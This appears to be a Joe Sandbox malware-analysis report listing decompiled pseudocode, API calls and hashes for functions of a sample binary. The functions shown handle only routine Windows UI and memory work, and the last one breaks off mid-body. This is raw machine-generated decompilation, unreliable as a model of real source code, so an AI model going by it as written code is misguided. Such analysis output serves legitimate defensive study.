String ID: %TsPane-%d$%TsPane-%d%x$IsFloating$MRUWidth$Panes$PinState$RecentFrameAlignment$RecentRowIndex$RectRecentDocked$RectRecentFloat
API String ID: 1400211622-2628993547
Opcode ID: ea071326fb702755b65c30ec97f1dace59238f39310566b096fbce45e7c14579
Instruction ID: d9fa5d761bd2b6f864fa29b628cf46fe573eda9ec5aad94c0e6e3dc053a84d5f
Opcode Fuzzy Hash: ea071326fb702755b65c30ec97f1dace59238f39310566b096fbce45e7c14579
Instruction Fuzzy Hash: 26812935A002099FCF04DFA5CC959FDB7B6BF89714F094468E926AB3A1CB31AA05DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00D0120E Relevance: 21.1, APIs: 14, Instructions: 119
timewindowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00D0120E(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagPOINT _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t46;
				void* _t49;
				void* _t76;
				void* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				intOrPtr _t89;
				void* _t90;
				signed int _t91;

				_t88 = __edx;
				_t46 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t46 ^ _t91;
				_t89 = _a4;
				_t90 = __ecx;
				_t49 =  *(_t89 + 4) - 0x200;
				if(_t49 == 0) {
					L4:
					_push(_t80);
					_v32.x = 0;
					_v32.y = 0;
					GetCursorPos( &_v32);
					ScreenToClient( *(_t90 + 0x20),  &_v32);
					_v24.left = 0;
					_v24.top = 0;
					_v24.right = 0;
					_v24.bottom = 0;
					GetClientRect( *(_t90 + 0x1630),  &_v24);
					MapWindowPoints( *(_t90 + 0x1630),  *(_t90 + 0x20),  &_v24, 2);
					_push(_v32.y);
					if(PtInRect( &_v24, _v32.x) != 0) {
						SendMessageA( *(_t90 + 0x1630),  *(_t89 + 4),  *(_t89 + 8),  *(_t89 + 8));
						if( *(_t89 + 4) == 0x201) {
							SetTimer( *(_t90 + 0x20), 0xec14, 0xc8, 0);
							_t87 = _t90;
							if( *((intOrPtr*)(_t90 + 0x1ddc)) == 0) {
								E00D0143A(0, _t87);
							} else {
								E00D014B6(_t87, _t88);
							}
						}
					}
					GetClientRect( *(_t90 + 0xe88),  &_v24);
					MapWindowPoints( *(_t90 + 0xe88),  *(_t90 + 0x20),  &_v24, 2);
					_push(_v32.y);
					if(PtInRect( &_v24, _v32) != 0) {
						SendMessageA( *(_t90 + 0xe88),  *(_t89 + 4),  *(_t89 + 8),  *(_t89 + 8));
						if( *(_t89 + 4) == 0x201) {
							SetTimer( *(_t90 + 0x20), 0xec13, 0xc8, 0);
							_t86 = _t90;
							if( *((intOrPtr*)(_t90 + 0x1ddc)) == 0) {
								E00D01606(_t86, _t90);
							} else {
								E00D0155D(_t86, _t88);
							}
						}
					}
					_pop(_t80);
					L15:
					return E00DDCBCE(E00CF6C65(_t80, _t90, _t88, _t89), _t80, _v8 ^ _t91, _t88, _t89, _t90);
				}
				_t76 = _t49 - 1;
				if(_t76 == 0) {
					goto L4;
				}
				if(_t76 != 1) {
					goto L15;
				} else {
					KillTimer( *(__ecx + 0x20), 0xec13);
					KillTimer( *(_t90 + 0x20), 0xec14);
					goto L4;
				}
			}

0x00d0120e
0x00d01214
0x00d0121b
0x00d01220
0x00d01223
0x00d01228
0x00d0122d
0x00d01259
0x00d01259
0x00d01260
0x00d01263
0x00d01266
0x00d01273
0x00d0127c
0x00d01286
0x00d01289
0x00d0128c
0x00d0128f
0x00d012a4
0x00d012aa
0x00d012bc
0x00d012cd
0x00d012da
0x00d012ea
0x00d012f0
0x00d012f8
0x00d01301
0x00d012fa
0x00d012fa
0x00d012fa
0x00d012f8
0x00d012da
0x00d01310
0x00d01325
0x00d0132b
0x00d0133d
0x00d0134e
0x00d0135b
0x00d0136b
0x00d01371
0x00d01379
0x00d01382
0x00d0137b
0x00d0137b
0x00d0137b
0x00d01379
0x00d0135b
0x00d01387
0x00d01388
0x00d0139d
0x00d0139d
0x00d0122f
0x00d01232
0x00000000
0x00000000
0x00d01237
0x00000000
0x00d0123d
0x00d01245
0x00d01253
0x00000000
0x00d01253

APIs

KillTimer.USER32(?,0000EC13), ref: 00D01245
KillTimer.USER32(?,0000EC14), ref: 00D01253
GetCursorPos.USER32(?), ref: 00D01266
ScreenToClient.USER32 ref: 00D01273
GetClientRect.USER32(?,?), ref: 00D0128F
MapWindowPoints.USER32 ref: 00D012A4
PtInRect.USER32(?,?,?), ref: 00D012B4
SendMessageA.USER32(?,?,?,?), ref: 00D012CD
SetTimer.USER32(?,0000EC14,000000C8,00000000), ref: 00D012EA
GetClientRect.USER32(?,?), ref: 00D01310
MapWindowPoints.USER32 ref: 00D01325
PtInRect.USER32(?,?,?), ref: 00D01335
SendMessageA.USER32(?,?,?,?), ref: 00D0134E
SetTimer.USER32(?,0000EC13,000000C8,00000000), ref: 00D0136B

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: RectTimer$Client$KillMessagePointsSendWindow$CursorScreen
String ID:
API String ID: 3023290659-0
Opcode ID: b9a08f2642177c3c034082e7de9241b506f84655a7775bd7191aebd315adc176
Instruction ID: 21415cc0ae156c51cb4c21eba414f2ae194018673e1bc444399077b2017743f3
Opcode Fuzzy Hash: b9a08f2642177c3c034082e7de9241b506f84655a7775bd7191aebd315adc176
Instruction Fuzzy Hash: DA41907690060AEFDB119FA5CD49DEEBBB9FF08701F048529F19AB15A0CB31A914DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CDC7F2 Relevance: 19.8, APIs: 13, Instructions: 329
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CDC7F2(void* __eax) {
				void* _t4;
				void* _t5;
				void* _t6;

				return E00DDD50E(_t4, _t5, _t6);
			}

0x00cdc7f8

APIs

IsRectEmpty.USER32 ref: 00CDC81C
IsRectEmpty.USER32 ref: 00CDC848
IntersectRect.USER32 ref: 00CDC8C0
IntersectRect.USER32 ref: 00CDC964
IsRectEmpty.USER32 ref: 00CDC9A2
IsRectEmpty.USER32 ref: 00CDC9B4
SelectObject.GDI32(?), ref: 00CDC9D1
IsRectEmpty.USER32 ref: 00CDC9EA
IsRectEmpty.USER32 ref: 00CDCA09
AlphaBlend.MSIMG32(?,?,?,?,?,00000000,?,?,?,?,?), ref: 00CDCA7B
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,00CC0020), ref: 00CDCAC3
SelectObject.GDI32(?), ref: 00CDCAD5
SetRectEmpty.USER32(?), ref: 00CDCB54

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Empty$IntersectObjectSelect$AlphaBlendStretch
String ID:
API String ID: 3434778532-0
Opcode ID: 857657a2f7375f117e8dbad4b055f55a36bd809e47f81abf6351ccd0aaac4e18
Instruction ID: 70d54dd06b15e9f5475d62f3a35de6ada3cb94f99cdc5ca91f533c3fe2e3c0ee
Opcode Fuzzy Hash: 857657a2f7375f117e8dbad4b055f55a36bd809e47f81abf6351ccd0aaac4e18
Instruction Fuzzy Hash: B6D1E272A0020AEFCF15CFA8C9849EEBBB5FF48314F15561AE916B7250D730EA45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CBE4D6 Relevance: 19.7, APIs: 13, Instructions: 247
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00CBE4D6(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v12;
				int _v16;
				struct HWND__* _v20;
				signed int _v24;
				signed int _v36;
				void* __ebp;
				signed char _t68;
				signed int _t76;
				signed int _t77;
				int _t78;
				struct HWND__* _t80;
				signed int _t82;
				signed int _t84;
				signed int _t89;
				struct HWND__* _t97;
				signed int _t109;
				intOrPtr _t113;
				intOrPtr _t120;
				void* _t124;
				void* _t127;
				struct HWND__* _t138;
				signed int _t140;
				void* _t156;
				intOrPtr* _t158;
				void* _t164;
				intOrPtr* _t167;
				signed int _t173;
				void* _t179;
				void* _t182;

				_t170 = __esi;
				_t164 = __edx;
				_t137 = __ebx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t166 = __ecx;
				_t68 =  !( *(__ecx + 0x84) >> 0xe);
				_t186 = _t68 & 0x00000001;
				if((_t68 & 0x00000001) == 0) {
					E00CAA4E7(__ebx, __ecx, __ecx, __esi, __eflags);
					asm("int3");
					_t167 = __ecx;
					E00CB0D45(__ecx, __esi, __eflags, 0x10);
					E00CB0D45(__ecx, __esi, __eflags, 0x3c000);
					 *0xe17a64(__ecx, __esi, _t182);
					 *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x170))))();
					_t76 =  *(E00CACEEE(__ebx, __ecx,  *((intOrPtr*)( *__ecx + 0x170)), __eflags) + 4);
					_v36 = _t76;
					__eflags = _t76;
					if(_t76 != 0) {
						E00CADE5B(_t76, 0);
					}
					_t77 =  *(_t167 + 0xcc);
					__eflags = _t77;
					if(_t77 != 0) {
						_t78 =  *((intOrPtr*)(_t77 + 0x20));
					} else {
						_t78 = 0;
					}
					_push(_t137);
					_t138 = E00CADE6B( &_v20, _t78,  &_v20);
					_v16 = 0;
					 *(_t167 + 0x88) = _t138;
					__eflags = _t138;
					if(_t138 != 0) {
						_t109 = IsWindowEnabled(_t138);
						__eflags = _t109;
						if(_t109 != 0) {
							EnableWindow(_t138, 0);
							_v16 = 1;
						}
					}
					_t80 = GetCapture();
					__eflags = _t80;
					if(_t80 != 0) {
						SendMessageA(_t80, 0x1f, 0, 0);
					}
					__eflags =  *(_t167 + 0x84) & 0x00004000;
					 *((intOrPtr*)(_t167 + 0x68)) = 0;
					if(__eflags == 0) {
						_t38 = _t167 + 0x60;
						 *_t38 =  *(_t167 + 0x60) | 0x00000010;
						__eflags =  *_t38;
					}
					_push(_t167);
					E00CB10B9(_t138, _t164, _t167, 0, __eflags);
					_t82 =  *(_t167 + 0x84);
					_t146 = _t167 + 0x80;
					_push(_t167 + 0x80);
					__eflags = _t82 & 0x00004000;
					if(__eflags == 0) {
						 *(_t167 + 0x84) = _t82 | 0x00000400;
						_t84 = E00CBF89D(_t138, _t146, _t167, 0, __eflags);
						 *(_t167 + 0x84) =  *(_t167 + 0x84) & 0xfffffbff;
						_t173 = _t84;
						E00CB13EC(_t138, _t164, __eflags);
						__eflags = _t173;
						if(_t173 == 0) {
							L34:
							_t49 = _t167 + 0x60;
							 *_t49 =  *(_t167 + 0x60) & 0xffffffef;
							__eflags =  *_t49;
						} else {
							__eflags = _t173 - 0xffffffff;
							if(_t173 == 0xffffffff) {
								goto L34;
							}
						}
						_v12 =  *((intOrPtr*)(_t167 + 0x68));
						 *0xe17a64();
						_t89 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x88))))();
						__eflags = _t89;
						if(_t89 != 0) {
							__eflags = (E00CB778C(_t167) & 0x00000100 | 0x00000400) >> 8;
							_v12 = E00CB5069(_t167, _t164, (E00CB778C(_t167) & 0x00000100 | 0x00000400) >> 8);
						}
						__eflags =  *(_t167 + 0x20);
						if( *(_t167 + 0x20) != 0) {
							E00CB7A83(_t167, 0, 0, 0, 0, 0, 0x97);
						}
					} else {
						_v12 = E00CBF89D(_t138, _t146, _t167, 0, __eflags);
						E00CB13EC(_t138, _t164, __eflags);
						 *(_t167 + 0x20) = 0;
					}
					__eflags = _v16;
					if(_v16 != 0) {
						EnableWindow(_t138, 1);
					}
					__eflags = _t138;
					if(_t138 != 0) {
						_t97 = GetActiveWindow();
						__eflags = _t97 -  *(_t167 + 0x20);
						if(_t97 ==  *(_t167 + 0x20)) {
							SetActiveWindow(_t138);
						}
					}
					__eflags =  *(_t167 + 0x84) & 0x00004000;
					if(( *(_t167 + 0x84) & 0x00004000) == 0) {
						 *0xe17a64();
						 *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x60))))();
					}
					_t149 = _v24;
					__eflags = _v24;
					if(_v24 != 0) {
						E00CADE5B(_t149, 1);
					}
					__eflags = _v20;
					if(_v20 != 0) {
						EnableWindow(_v20, 1);
					}
					return _v12;
				} else {
					_t156 = E00CACF3C(__ebx, __ecx, __esi, _t186);
					_t113 = _a8;
					if(_t113 != 0xffffffff) {
						 *((intOrPtr*)(_t156 + 0x1c)) = _t113;
					} else {
						 *((intOrPtr*)(_t156 + 0x1c)) = 0x90c020c4;
						_t188 =  *(_t166 + 0x84) & 0x01000020;
						if(( *(_t166 + 0x84) & 0x01000020) == 0) {
							 *((intOrPtr*)(_t156 + 0x1c)) = 0x90c820c4;
						}
					}
					 *((intOrPtr*)(_t156 + 0x20)) = _a12;
					E00CB0D45(_t156, _t170, _t188, 0x10);
					E00CB0D45(_t156, _t170, _t188, 0x3c000);
					_t177 =  *((intOrPtr*)( *_t166 + 0x170));
					 *0xe17a64();
					_t158 = _t166;
					 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x170))))();
					 *(_t166 + 0x84) =  *(_t166 + 0x84) | 0x00000500;
					_t120 = _a4;
					 *(_t166 + 0xd4) = 1;
					 *((intOrPtr*)(_t166 + 0xa4)) = E00CBE162;
					_t189 = _t120;
					if(_t120 != 0) {
						_t120 =  *((intOrPtr*)(_t120 + 0x20));
					}
					_push(_t166);
					 *((intOrPtr*)(_t166 + 0x88)) = _t120;
					E00CB10B9(_t137, _t164, _t166, _t177, _t189);
					_push(_t166 + 0x80);
					_t140 = E00CBF89D(_t137, _t158, _t166, _t177, _t189);
					_t190 = _t140 - 0xffffffff;
					if(_t140 == 0xffffffff) {
						L14:
						_t124 = 0;
					} else {
						if(E00CB13EC(_t140, _t164, _t190) == 0) {
							 *0xe17a64();
							 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x120))))();
						}
						_t179 = GlobalAlloc(0x40, 4);
						_t127 = GlobalLock(_t179);
						if(_t127 == 0) {
							L13:
							 *0xe17a64();
							 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x60))))();
							goto L14;
						} else {
							 *_t127 = 1;
							GlobalUnlock(_t179);
							if(SetPropA( *(_t166 + 0x20),  *0xe68294, _t179) != 0) {
								__eflags = _t140;
								if(_t140 == 0) {
									goto L14;
								} else {
									_t124 = 1;
								}
							} else {
								GlobalFree(_t179);
								goto L13;
							}
						}
					}
					return _t124;
				}
			}

0x00cbe4d6
0x00cbe4d6
0x00cbe4d6
0x00cbe4d9
0x00cbe4da
0x00cbe4db
0x00cbe4dc
0x00cbe4e7
0x00cbe4e9
0x00cbe4eb
0x00cbe610
0x00cbe615
0x00cbe620
0x00cbe622
0x00cbe62c
0x00cbe63b
0x00cbe643
0x00cbe64c
0x00cbe64f
0x00cbe652
0x00cbe654
0x00cbe659
0x00cbe659
0x00cbe65e
0x00cbe664
0x00cbe666
0x00cbe66c
0x00cbe668
0x00cbe668
0x00cbe668
0x00cbe66f
0x00cbe67a
0x00cbe67c
0x00cbe67f
0x00cbe685
0x00cbe687
0x00cbe68a
0x00cbe690
0x00cbe692
0x00cbe696
0x00cbe69c
0x00cbe69c
0x00cbe692
0x00cbe6a3
0x00cbe6a9
0x00cbe6ab
0x00cbe6b2
0x00cbe6b2
0x00cbe6b8
0x00cbe6c2
0x00cbe6c5
0x00cbe6c7
0x00cbe6c7
0x00cbe6c7
0x00cbe6c7
0x00cbe6cb
0x00cbe6cc
0x00cbe6d1
0x00cbe6d7
0x00cbe6dd
0x00cbe6de
0x00cbe6e3
0x00cbe6ff
0x00cbe705
0x00cbe70a
0x00cbe714
0x00cbe716
0x00cbe71b
0x00cbe71d
0x00cbe724
0x00cbe724
0x00cbe724
0x00cbe724
0x00cbe71f
0x00cbe71f
0x00cbe722
0x00000000
0x00000000
0x00cbe722
0x00cbe72b
0x00cbe738
0x00cbe740
0x00cbe742
0x00cbe744
0x00cbe759
0x00cbe762
0x00cbe762
0x00cbe767
0x00cbe76a
0x00cbe778
0x00cbe778
0x00cbe6e5
0x00cbe6ea
0x00cbe6ed
0x00cbe6f2
0x00cbe6f2
0x00cbe77d
0x00cbe781
0x00cbe786
0x00cbe786
0x00cbe78c
0x00cbe78e
0x00cbe790
0x00cbe796
0x00cbe799
0x00cbe79c
0x00cbe79c
0x00cbe799
0x00cbe7a2
0x00cbe7ad
0x00cbe7b6
0x00cbe7be
0x00cbe7be
0x00cbe7c0
0x00cbe7c5
0x00cbe7c7
0x00cbe7cb
0x00cbe7cb
0x00cbe7d0
0x00cbe7d4
0x00cbe7db
0x00cbe7db
0x00cbe7e5
0x00cbe4f1
0x00cbe4f6
0x00cbe4f8
0x00cbe4fe
0x00cbe51c
0x00cbe500
0x00cbe500
0x00cbe507
0x00cbe511
0x00cbe513
0x00cbe513
0x00cbe511
0x00cbe524
0x00cbe527
0x00cbe531
0x00cbe538
0x00cbe540
0x00cbe546
0x00cbe548
0x00cbe54a
0x00cbe554
0x00cbe557
0x00cbe561
0x00cbe56b
0x00cbe56d
0x00cbe56f
0x00cbe56f
0x00cbe572
0x00cbe573
0x00cbe579
0x00cbe584
0x00cbe58a
0x00cbe58c
0x00cbe58f
0x00cbe5fe
0x00cbe5fe
0x00cbe591
0x00cbe598
0x00cbe5a4
0x00cbe5ac
0x00cbe5ac
0x00cbe5b8
0x00cbe5bb
0x00cbe5c3
0x00cbe5ed
0x00cbe5f4
0x00cbe5fc
0x00000000
0x00cbe5c5
0x00cbe5c6
0x00cbe5cc
0x00cbe5e4
0x00cbe607
0x00cbe609
0x00000000
0x00cbe60b
0x00cbe60d
0x00cbe60d
0x00cbe5e6
0x00cbe5e7
0x00000000
0x00cbe5e7
0x00cbe5e4
0x00cbe5c3
0x00cbe604
0x00cbe604

APIs

GlobalAlloc.KERNEL32(00000040,00000004,?), ref: 00CBE5B2
GlobalLock.KERNEL32 ref: 00CBE5BB
GlobalUnlock.KERNEL32(00000000), ref: 00CBE5CC
SetPropA.USER32 ref: 00CBE5DC
GlobalFree.KERNEL32 ref: 00CBE5E7
IsWindowEnabled.USER32(00000000), ref: 00CBE68A
EnableWindow.USER32(00000000,00000000), ref: 00CBE696
GetCapture.USER32 ref: 00CBE6A3
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00CBE6B2
EnableWindow.USER32(00000000,00000001), ref: 00CBE786
GetActiveWindow.USER32 ref: 00CBE790
SetActiveWindow.USER32(00000000), ref: 00CBE79C
EnableWindow.USER32(00000000,00000001), ref: 00CBE7DB

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$Global$Enable$Active$AllocCaptureEnabledFreeLockMessagePropSendUnlock
String ID:
API String ID: 2841214920-0
Opcode ID: b6dc52a4e294fe76e94181e28b4c2ba05f0542e1da25220f16456f515e462122
Instruction ID: 6044e01386d50969df699d0ad3b46458d8d6450a9374116ef60ebd62d0e3e818
Opcode Fuzzy Hash: b6dc52a4e294fe76e94181e28b4c2ba05f0542e1da25220f16456f515e462122
Instruction Fuzzy Hash: 6791DF70700616AFCB14AF75C888BEE7BA9BF04B10F044118FA66E7291DF74DA01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00DFF2E5 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00DFF2E5(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xe68ef0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00DF47C5(_t46);
							E00DFE5DF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00DF47C5(_t47);
							E00DFEA93( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00DF47C5( *((intOrPtr*)(_t74 + 0x7c)));
						E00DF47C5( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00DF47C5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00DF47C5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00DF47C5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00DF47C5( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00DFF456( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xe69050) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00DF47C5(_t31);
							E00DF47C5( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00DF47C5(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00DF47C5(_t74);
			}

0x00dff2ed
0x00dff2f1
0x00dff2f9
0x00dff302
0x00dff307
0x00dff30e
0x00dff316
0x00dff31e
0x00dff329
0x00dff32f
0x00dff330
0x00dff338
0x00dff340
0x00dff34b
0x00dff351
0x00dff355
0x00dff360
0x00dff366
0x00dff307
0x00dff367
0x00dff36f
0x00dff382
0x00dff395
0x00dff3a3
0x00dff3ae
0x00dff3b3
0x00dff3bc
0x00dff3c4
0x00dff3c5
0x00dff3cb
0x00dff3ce
0x00dff3d1
0x00dff3d8
0x00dff3da
0x00dff3de
0x00dff3e6
0x00dff3ed
0x00dff3f3
0x00dff3f4
0x00dff3f4
0x00dff3fb
0x00dff3fd
0x00dff402
0x00dff40a
0x00dff40f
0x00dff410
0x00dff410
0x00dff413
0x00dff416
0x00dff419
0x00dff41c
0x00dff41c
0x00dff42c

APIs

___free_lconv_mon.LIBCMT ref: 00DFF329

Part of subcall function 00DFE5DF: _free.LIBCMT ref: 00DFE5FC
Part of subcall function 00DFE5DF: _free.LIBCMT ref: 00DFE60E
Part of subcall function 00DFE5DF: _free.LIBCMT ref: 00DFE620
Part of subcall function 00DFE5DF: _free.LIBCMT ref: 00DFE632
Part of subcall function 00DFE5DF: _free.LIBCMT ref: 00DFE644
Part of subcall function 00DFE5DF: _free.LIBCMT ref: 00DFE656
Part of subcall function 00DFE5DF: _free.LIBCMT ref: 00DFE668
Part of subcall function 00DFE5DF: _free.LIBCMT ref: 00DFE67A
Part of subcall function 00DFE5DF: _free.LIBCMT ref: 00DFE68C
Part of subcall function 00DFE5DF: _free.LIBCMT ref: 00DFE69E
Part of subcall function 00DFE5DF: _free.LIBCMT ref: 00DFE6B0
Part of subcall function 00DFE5DF: _free.LIBCMT ref: 00DFE6C2
Part of subcall function 00DFE5DF: _free.LIBCMT ref: 00DFE6D4

_free.LIBCMT ref: 00DFF31E

Part of subcall function 00DF47C5: HeapFree.KERNEL32(00000000,00000000,?,00DFED34,?,00000000,?,00000001,?,00DFEFD7,?,00000007,?,?,00DFF47C,?), ref: 00DF47DB
Part of subcall function 00DF47C5: GetLastError.KERNEL32(?,?,00DFED34,?,00000000,?,00000001,?,00DFEFD7,?,00000007,?,?,00DFF47C,?,?), ref: 00DF47ED

_free.LIBCMT ref: 00DFF340
_free.LIBCMT ref: 00DFF355
_free.LIBCMT ref: 00DFF360
_free.LIBCMT ref: 00DFF382
_free.LIBCMT ref: 00DFF395
_free.LIBCMT ref: 00DFF3A3
_free.LIBCMT ref: 00DFF3AE
_free.LIBCMT ref: 00DFF3E6
_free.LIBCMT ref: 00DFF3ED
_free.LIBCMT ref: 00DFF40A
_free.LIBCMT ref: 00DFF422

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: fddd5ed3bb24dd7ac3437539ad646857fc83fafc5f5a4c0f47d5a9c759569f5f
Instruction ID: be8a72e12cd3221fd0240fed67aecae31b2606dac09fe2472ddf517ec8d543f6
Opcode Fuzzy Hash: fddd5ed3bb24dd7ac3437539ad646857fc83fafc5f5a4c0f47d5a9c759569f5f
Instruction Fuzzy Hash: 16311D31500209ABEB21AB38D945B6B73E8EF41714F1AC539E259D6191EF71EC408A70

Uniqueness

Uniqueness Score: -1.00%

Function 00CF36FF Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 246
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00CF36FF(void* __ebx, signed int __ecx, void* __edx, void* __edi, int __esi, void* __eflags, void* __fp0) {
				signed int _t97;
				signed int _t109;
				signed int _t113;
				signed int _t116;
				signed int _t119;
				void* _t125;
				signed int _t129;
				intOrPtr* _t136;
				signed int _t138;
				void* _t141;
				void* _t143;
				signed int _t146;
				struct HICON__* _t151;
				struct HICON__* _t156;
				struct HICON__* _t161;
				intOrPtr _t165;
				void* _t167;
				signed int _t172;
				signed int _t177;
				signed int _t197;
				signed int _t204;
				signed int _t208;
				signed int _t209;
				signed int _t216;
				void* _t226;
				signed int _t239;
				void* _t243;
				signed int _t245;
				void* _t248;
				void* _t254;
				void* _t255;
				void* _t259;

				_t259 = __fp0;
				_t250 = __esi;
				_t243 = __edx;
				_push(0x28);
				E00DDD55F(0xe0b729, __ebx, __edi, __esi);
				_t245 = __ecx;
				_t196 =  *(_t255 + 8);
				if( *((intOrPtr*)(__ecx + 0xb78)) == 0 ||  *0xe8738c == 0) {
					_t250 =  *( *_t245 + 0x26c);
					 *0xe17a64();
					_t97 =  *( *( *_t245 + 0x26c))();
					__eflags = _t97;
					if(_t97 != 0) {
						goto L33;
					} else {
						__eflags =  *((intOrPtr*)(_t245 + 0xba4)) - _t97;
						if( *((intOrPtr*)(_t245 + 0xba4)) != _t97) {
							goto L33;
						} else {
							_t250 =  *( *_t245 + 0x3b0);
							 *0xe17a64(0xffffffff);
							 *( *( *_t245 + 0x3b0))();
